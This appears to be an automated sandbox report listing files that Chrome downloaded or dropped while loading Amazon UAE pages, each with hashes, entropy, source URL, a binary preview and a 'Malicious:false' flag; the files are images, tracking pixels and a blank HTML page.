                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!..1AQ..Ua...."235BRTq........#Crt....$%b....................................................!12Q"...3Aa............?.........DD....D@...DD....D@...D^..$.......q..ZR.ed2..=...6....$.w......Eu..YH....I.f.T..qJ>f..T-g.K.[.....9..H....}........k..}......>.{$tQ..R.?W7.o.V...tC7...9mOC..d..'...?yM).\.S..?.w...S..z...bE.M.....yf?.u.3_.Q.<3F.$.f?K.&..@G......!../.e." .eC\._.j.5......u..._..8423..........._?]'.9d...AL."o...d.3...3.9.L.I.T.6.J.>.I..C#.E.......PW]F......b/...].[V.....l.lT.6..9V..S...j..5f.+n).....Os.e.PS$`.........e.L..../~i...Al....:q.u...^.1K1.&?..}e.....G/3.lA.2.$..vo''...SPW '...vU.h.N..K...A..I0.5N...../1E#..%.A8.P..$..N.M.e......-.f...F...\^....S.....<...`..L_.,.F75.g.G...R.$L.&{.h..#w2.g.=..?......$...#.s...z....qk)d.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):68782
                                                                                                                                                                                                                                                                Entropy (8bit):7.976825743641747
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:rIZGY8i4nqkvDYubQwqNAUnF5CQLPqIPl9IAXkK4zwxZ62Y:rhuoXbYcdc3FbjqIt9F4zwj6F
                                                                                                                                                                                                                                                                MD5:D4F855A97CE69E0B4359AB927EC28574
                                                                                                                                                                                                                                                                SHA1:6FE0487FA6ADBCAEDF60DBFB8086C001C0292307
                                                                                                                                                                                                                                                                SHA-256:19B9598112754CE0A2612686ABC08BA18981C528FC3189C6AAAB4087ADB855E6
                                                                                                                                                                                                                                                                SHA-512:9E9775C21FBBD3F119569B94416DB3809CE68FB39726A514FE87560F7034EBECFE7019DBA6E920DAB8602F1022E65D77CD6F7B7570C62E5FA846A45E27FECA75
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986217_UAE_Budget_Store_AE_xsite_bubbler_HPC_en_400x400_2X._CB644457597_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................................;.................................................................................`..0...@.YoQ......q....|~./?.Z.~u.....d..w\................<9a...c.^..69....d.........Fj..(u.a...............o....vEhc.zN.........v.....LK.'.\i@...........m...@.!.............X.L...JYi.._.........k...y.+1............/.mw<}&.}.`c ......G...w...............9K.....)..7......."......H....@..........~..2'.p...<.........-.a.......5.....V.......|..;....c.W=.....e7#....4.....@.."..........3'u'...!..D..%6..........b.(.0'Tv....;E...<...~.....n......|...~.t..;.........&...9..64..1oqm%.............O.M"d...t.....L..<...}....d.......h.=.*..<...>....$..c~...+....{~#......=...8N.R......K...........!u..._!.~.x.......#&.0...O.q....j......<.?.]...^.....a........l..1.w...Kj./.L..WO).... <..............f>..oowX......".O...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 289x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9729
                                                                                                                                                                                                                                                                Entropy (8bit):7.933093509303515
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:9vHBw5hQhAWHJA8Io77vzSm+XvE18zRRO7GqpM610qJG/jkFFHc:9vhwFQ+8z777wE1wRROSW10vyHc
                                                                                                                                                                                                                                                                MD5:7D01A3DAF3A14BB9947FE0674E467BC9
                                                                                                                                                                                                                                                                SHA1:785A8F314122793B2A5F10A13581672ED71E9ABD
                                                                                                                                                                                                                                                                SHA-256:9AB37178BAEF86FE67DE5D1E0FE56B24272DF1DB736A4EA4DBD8DB0092227B70
                                                                                                                                                                                                                                                                SHA-512:88BB349FEF3E1009788400B33A39223CDCE52BA0B66EF7AFF16C907EB31832218CD6BBD49665451426ECCCCF000FE62E8BCBB797162BCDADA4F2524864E92119
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........!.."..........2...............................................................].Fhg...+..&L....g....S.....0.p..IX...c....[O+=.<,..<.CY...MA.....j.8.T.*e.A:.....)6A.7......w%t,EuK2.B...E.=./o.).M|.a...`Lj..A.f2..y....b".a.NYD!I..BJ..I..K.CfT.Y..I.!RmHT.R.."..i...".....C..y.,....W.u..r..OD!Z...+.<z5....D.`QA....G4F..U.5b.C.K....+.w..;.7.G..W.-P.L1.B.U.pkb#,.L...m........sf...9ka..8DsD..jv.i......>z...........uN.o.)\...j...=..s/.^X.t.....F...>..9".z.q#}...].5...F.Dc.b..%.L..0...I.Qz!' ..0.V....$.#......=+.u./*l.]R.H.(.OE..`.....F..>.].5s\... .0+.J.e.G.G......=U..).2......../....e..O...n6]..x.l..........:.../.P..A.9..U.`'.K..-..$..).6........6.Sq..7...v..F.".S....._..P.[C.[.!..Z..5....n...`.X ....l.. a.Z.oi...g..z..9QD..a...0......8..W02...\j=...A`......w...].w....aq.....T.~5.D.#HPA...F......
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):71
                                                                                                                                                                                                                                                                Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 240 x 735, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):6829
                                                                                                                                                                                                                                                                Entropy (8bit):7.762659774988712
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:Y6JdU2FlfkTCpJxR0P10gvhbeNs359AZGcF80PnVmohveKKlNGsD6pqGZ7Afb3F:FjkTCxO0gvhsLBp1hm70pRZSp
                                                                                                                                                                                                                                                                MD5:13FD5F8C8447783E11D8B9717A38CF2F
                                                                                                                                                                                                                                                                SHA1:553793E4D98E5A3C349047B9D9097EECF5D799D9
                                                                                                                                                                                                                                                                SHA-256:9B280F263A12EC4C9B718DCA074F908493A05A81EB5F9D29023949E33EBD3152
                                                                                                                                                                                                                                                                SHA-512:E06A02652E492FFEED3BA4D324C2DC16475FCCE4A884472B5FD28D0BAE4AA5434BDB06536E7827360ECED8AD82A193B5E78FB8FABFCE8F6BCE86A36C57187FE8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/S/sash/vfqcwUkuArEiwD2.png
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR.............h.j....PLTE....../8B..................EIRtw~{~.8=G7<F;@J>CMAFP...:?H<AJ?DM@ENCHQBGPFKT5;EDIQFKSEJRQV^6<E8>GOWctx~sw}......CKVJR]:@H<BJ=CK@FN`el}.....:DP6?JEP]6>H9AK;CMCKUBJTnw.t|......................09C1:D>IU3<F?JV9CN4=G5>H>HSDNYDMW=EN?GPAIRBJSDLUXbmGOXHPYkt~eltx..qw~AMY6@J7@IIT_;DM=FOMWaHQZ\fpU]eu{..............................................CMVcmv...ry...................................................#..&..(..*..+..-.....0..3..4..6..9..=..>.<..@..C..@..D..G..H.D..K..O..R..M..V..T..g..n..p..r..r..t..u..v..x...................................&..2..=..L..U..\..c..m..x...............................................................................................................................{{{tttkkkeeeZZZRRRKKKFFF@@@<<<666333***$$$.....................`.FB....tRNS...................................................................................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:M6RE43WFQNSF80R5MH23$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DM6RE43WFQNSF80R5MH23%26m%3D1%26sc%3Dcsa%3AbrowserQuiteMut%26pc%3D4837%26at%3D4837%26t%3D1723469068773%26csmtags%3DbrowserQuiteMut%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DM6RE43WFQNSF80R5MH23%26aftb%3D1%26lob%3D1:4837
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):6560
                                                                                                                                                                                                                                                                Entropy (8bit):7.938477882981532
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TFJy1PHWOYwCZBSJl1s5DlMC9lKDIwFpBKiT8aUyyujvyTN7kCo20hJ/pm45Saiw:68OmWl1s5DrKUwFyirbeB7FGB7AafJD5
                                                                                                                                                                                                                                                                MD5:0104AF5BED12A82E598BEE79999C94EB
                                                                                                                                                                                                                                                                SHA1:0B69A809EC785424B7D9D9DF758B61661F9A5D4A
                                                                                                                                                                                                                                                                SHA-256:BCC904EC7847E64D5F0AF6D71DCC08C8A133570B272A81B30F2561AADA1680D2
                                                                                                                                                                                                                                                                SHA-512:38A8138D68D12CABBCF8263B60D427F52936DDA2EC8E452389F328626D13E662DCBEC3B50B5AF35807B3D0E25F9D09B81C7CA581F7C01236F7579BEB01D276F7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/71XEfI+E++L._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1..AQq."2Ra....#Bbr..C....34......%..DSs..................................................!1A.."a2....Qq..............?..tQE.QE..E.P..Q@.Qqy....'..$...,..c..|[..T.9x);.Z...c.b..'...hW.[.i.!y........o...K.-......._...p.#z..G3k....<Y..7........%?SQm......s'.......u.......W..)..W..Q...-7...l.6..,.{. 3.U.o1...2i.....j.qY..7...x`..{a.sj..{..p!P....&..>.rI...9..M..Jm,.............W.xT..*I......k......V...y..X].....u}....7{Cum.j...\../&#,......5>.[kt..F`N.C.....V...fk.,..A..W..E(....-..... a..'.4.Z.x)\.[..nu.......%[OZ"...nR&k].Y.].f.s.....!..n.....5..sqp.;..?.N...sm"Z......pIR;..{..h..S.M.R,.2[...u.....~..Gu-[.%.........Q@.QE.QE..E.P..Q@.Q\..m..y.gu..o.@t........R$...c...3.~..3k..._....q.X..V...i.^.@./...-.."4Ln...78...zd..w..r...w
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):14932
                                                                                                                                                                                                                                                                Entropy (8bit):7.92744198878233
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:/jkrSJLdG0q4/qaBgLXNgEaEwlM2AIQJXnqVaNXRj:orSJY0q4/qaBINg4JXnq0xRj
                                                                                                                                                                                                                                                                MD5:405F2D18906DB59E62294607F35B4C5A
                                                                                                                                                                                                                                                                SHA1:A4C51835965EF7B2CFC318368AC31DC9C28F178F
                                                                                                                                                                                                                                                                SHA-256:8468201EADD075F91789D50F89738E782078780EAF0ADF54014DF55DF037670D
                                                                                                                                                                                                                                                                SHA-512:438B25D7CED128C037B4A4E599299D8BD6E231E196ED750DA9A48E4EAAE2E953CDC379EBE01A2A3F1B44B1BA112BCCCC85BF79E69B09B05E015DE9285F1EC9FC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........3......................................................................9;ym^,........}3.J.....Mq.If.Rt....Yh.........(.h./[#..,2..oG...'...5..~q..v...13.8..A.N...!.7.S._..3._......{X.u.=.......U.Rr..4.].J/.TJI.DT.#R....&..Uwe..7f^{ZI.B."a...tT......c...i....evq.t...,.y..y........ly.7.....Tk(S.F...7.`...7y...9I8...M..{+..."i'..YC....V....ik....$...|.Q|xF.p..........4................;.=rr.i...7h..'r....>..!.f^...4q:hK.i.....oW.7.{s.Y8.....*.c..o.....>Z.JK.0......1.a...|.>.j.....:..........P}N.u.{..^]y.7...Oci..l.o..Pg.Z.o.tn.......}K..x..\.w_..?:..H.....^{t.......H..........P|...2......y#..S..G./..Z^..}N9..6..h...W..m..G.._i.7y....+..nx..c.s..A.!6.).._..N.=..............qs.3].Wk.M:^..,.K.u.b.......... ..c]a...<.dm.......v..N.@.v.ea.:..YO.D....[e.80........G..'Z.e.T
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):12378
                                                                                                                                                                                                                                                                Entropy (8bit):7.906298624082549
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:KLdPr+x6wMESGehV6E12cqd6wpC6HTd6ba6VJ5C/g4ZDsgHSRFdyfPCWn:KLvwFSGykE12gwP6u6H0/glcSNyfKWn
                                                                                                                                                                                                                                                                MD5:635C1F9BCA0B6682A9629D23A2499BEC
                                                                                                                                                                                                                                                                SHA1:28FED44220A01C59E5F980E893CED147EE52AEFF
                                                                                                                                                                                                                                                                SHA-256:586888B085A99F4997B188A26E1E8B0D5687CB3B819626E7FABC7F31CB73AF2D
                                                                                                                                                                                                                                                                SHA-512:F386C41CB94700D83715E16E09FF90D2FE2CBA95189C0278F59B00F7A19C6188FF014B7B0547D94DC390DFC80ACC1F81CD48F2E7CF534B75E2ED8BCA838F56C3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................,..........................................G ..............[...i.0..S.K...Q....O.W.v.9..Bc.. .....:.;..t\v..m..v2.........Z....z..?E~id#...W..........?!fpl..%...U.9b.<.5...76.?y.=.)....7r.E...k..."9.]...t.+F.g.1v......W..W2.3./~....X...........1...`.:1..6d8.6..LY{..~o....2.E......)"#.hHa.".......0:....$R..o=d{.....0.......1.,a.sX,.e..G.?B|6}1..GP.....,U...E...K....)a#.h.b.......0Z..FzH.*...].wT..g@.........b.-..f.c-....xk.,....DQI..2BG...L.2..C,U..@C.q.QU.vwvq..v.F3.QQU..e;.....@............O7..h.Z...C\UDU.Q.q.C$$QI...3...RDQ...pM..RDS.q.Z]ZF.R.u..UG.WV.FO....g..:........>c.q...7..kqiQE\E....RDG...C,$x\../.".d............n......q.x+...2......f.........7.8~k..............:.(.H......g......)a....(...9#.....&...q.y.%.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 129x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):8134
                                                                                                                                                                                                                                                                Entropy (8bit):7.936013516694866
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:d2SgQy2VpBoFm2NLEPmJ5OWKgdRh65kJ6mMyc9khzLdhHWf:dAQy2VpBgmAjJAWLRakJ6ByfPdhQ
                                                                                                                                                                                                                                                                MD5:F3A5F322CB7928D456CFAD2F5A8D6AAF
                                                                                                                                                                                                                                                                SHA1:A39B5A50DBC9DA6BF980B3702E7F4339304EF6AD
                                                                                                                                                                                                                                                                SHA-256:4436C21C26FEEA6056F5E27E1B364B515C67FF60194F5B923993D58DDB15FEE9
                                                                                                                                                                                                                                                                SHA-512:99512E74189CB3A7FA5577171C1DD5D4F954FEC2BC459BA5D4399FBB336CB05EEC5AC971A5D6E1B989FEDA1A17E4BEEEB5200079C2D4C2B39016B1AAF9D50E6C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/71aG0m9XRcL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!..1"AQs..#4Daq....2...3BRTrSb.................................................1AQ....!"#aq............?...u...).....Y&5'..y...../.]...|..H..v..9..a..U.........6.O..~R.6.?.5..^..)........s.......Lv...ze....'.......w....=..F~.....l........-.2.J...'...O..9.Yb.by]|..o..x.p<~.B.....,_......./.]"...(A. $......`....q...(!X.v.p..a..ay.....zmtg..R...F~.....-...n..Q...*B....B.G.8...V.F.8.H..%........wg'.<.Q..F~.....k.?e..H....P..)R...k.....x.`k).....ww....^=.F..mt~>k....k.?e..^..B. .c...s....?.1...........S.'........9f.Ck...b....F~......d.w./....=..i...2._p..F..Q.C...S.......gm......<.tC.k.Qv..>Q.v...z4.....x.GxP..~.KjJ..$.....KS..r..S.{.=:.3....'T..B.T.....F.k:..B.*..@..m.e.m.........:.7*U..f@*H..........PXc9...:.......R....h.g.|E.CML.OrD...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26ctb%3D1%26sc0%3Ddesktop-1-active%26cf0%3D41684%26pc0%3D41684%26ld0%3D41684%26t0%3D1723469044682%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41683
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 188x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):9761
                                                                                                                                                                                                                                                                Entropy (8bit):7.958214983605966
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:o8RbevfNKlBTW8WiT/DciLSptJsorCLWVB7XoohLj20Sau:1RC4vTWjg/DRGpKmXZLj20Pu
                                                                                                                                                                                                                                                                MD5:A3A65967EB3444FED8220D8EED4C06D4
                                                                                                                                                                                                                                                                SHA1:86CD8810AA2B6DDC7593185B925BFDD8A1ADAFA8
                                                                                                                                                                                                                                                                SHA-256:1861F2E3151DBFE762332B1CD290D637945380EE32E227E338A7A4AD44B1A689
                                                                                                                                                                                                                                                                SHA-512:C08778DEA4EC839F336589B1F23ACFCDBD4D6BAA41D45FE2D2EDC1C8CC44EE8CD137BE2A4AD91069B1E52BF21A5BA69D00078DF48697410E0252D4FB944F1BCD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/718G151Go9L._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.1.AQ."q..2ar...#3Bs....4R.tu....$&56CSb.....%ET...................................................1..!A.3BQq.#2...............?..u...{N......Z.$.u....6.J..Y.ry.s...I....l.J.ync..a.......".......r....2..-f.:..e....W..8.>....m....e?ntO.^.e..0...>..?..R.o...Z..../.kO.h|...TW...1[Z(>.,...Hd...D$F...b.....riF>5...q..Jk..Od.uN..:...&..M9T}..t6........R.~h.k.i...K.. ...'.&..)...b...~...Y._...Y^...Q].x..?n.y..V.#...,....8.......H?Yu.}..Z..|.e........GOV.'+?..A..V....Ck.W....7\i).k6..C..7/_.p0o..%D.l...G.|.4D.5......(i..a]/l...W..?+%.)e..h=.t..=Z..K..,o.....w....;2...|A.BC...K.t6+......SE.u.LXC.1k...H....XEN....... VTUu....^..w..T.k.x..-W..1P..W.*.....3.@.?(......_.[:~*..?......O._.......o....Q-o......g.k...Y.....}.....6..r..ei.0...A..m
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 154x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):12700
                                                                                                                                                                                                                                                                Entropy (8bit):7.9640877994381185
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:hvGAVlTylE+EmnML3dHKjQpxHbPYfqxIyFhx:hvGA7UrMZqQ3bQyxbhx
                                                                                                                                                                                                                                                                MD5:E8464EE006AFB4B5D22949790F99C342
                                                                                                                                                                                                                                                                SHA1:2D96918329209FE83604EA6E79C2F378DCB7C86A
                                                                                                                                                                                                                                                                SHA-256:D51927AB3129115FC9D4FBA85668121C9FA6604FF2EDC92E36AB6275078E5C48
                                                                                                                                                                                                                                                                SHA-512:4A0A402000CE9271CF5B333F439994FD6CDC9B8A17CCDD4654CF46A3A54616CF800D510FC2F6804E7931C4DE2947892ED4F727A7D6FCF95D94284BA93D0D4D54
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/81ybujRNAXL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.."1AQ..2aq..4B..#3.......RSbt...$56rsu....C......................................................1.!Q.Aaq...."235Rr.....#..b......%BC............?....[...3\.4.....()...h^R9......8.\.d.*&&L.m.}Q...h.7(....0..W.vCH.-.a....-..z...6;.'.-.Jb@7.0H.H .e..>..J...8<........d.;.d.c5.I.=3gt..T.i..BX.3...\.......I.h....y._.......!.....$..'.9...._H...C.l....W.N..L...].b..p.W..8..(.H..a...SQ....x%.....H...6]...n.1.......}.-.u.j;..8.....o...D........>....a.<.....?...c./.'JY+....;@..8.Z.......S3kzGEb.AH.GR..E.D-.,....>.@63.O.b.".h?..V5.f..eg..*...7.j....d!.E..u...F^Q.....S....6..0..U......!^.(....P.k...~.......oU...."g.........V.G....h?S...$......>.....j......rw.1.............joIY.A.hl....f`..bC.j@.f...f.L.{..7;.....y.........j.`
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2589
                                                                                                                                                                                                                                                                Entropy (8bit):7.7712717716698
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6X5JulF+VOBl603eLHbETbhhmn1i2APiLb3geYVHq:Tf5JgL3YMbqI2APKb3AVK
                                                                                                                                                                                                                                                                MD5:8C6776BF2CFA22C6AFEACADE6CC45D99
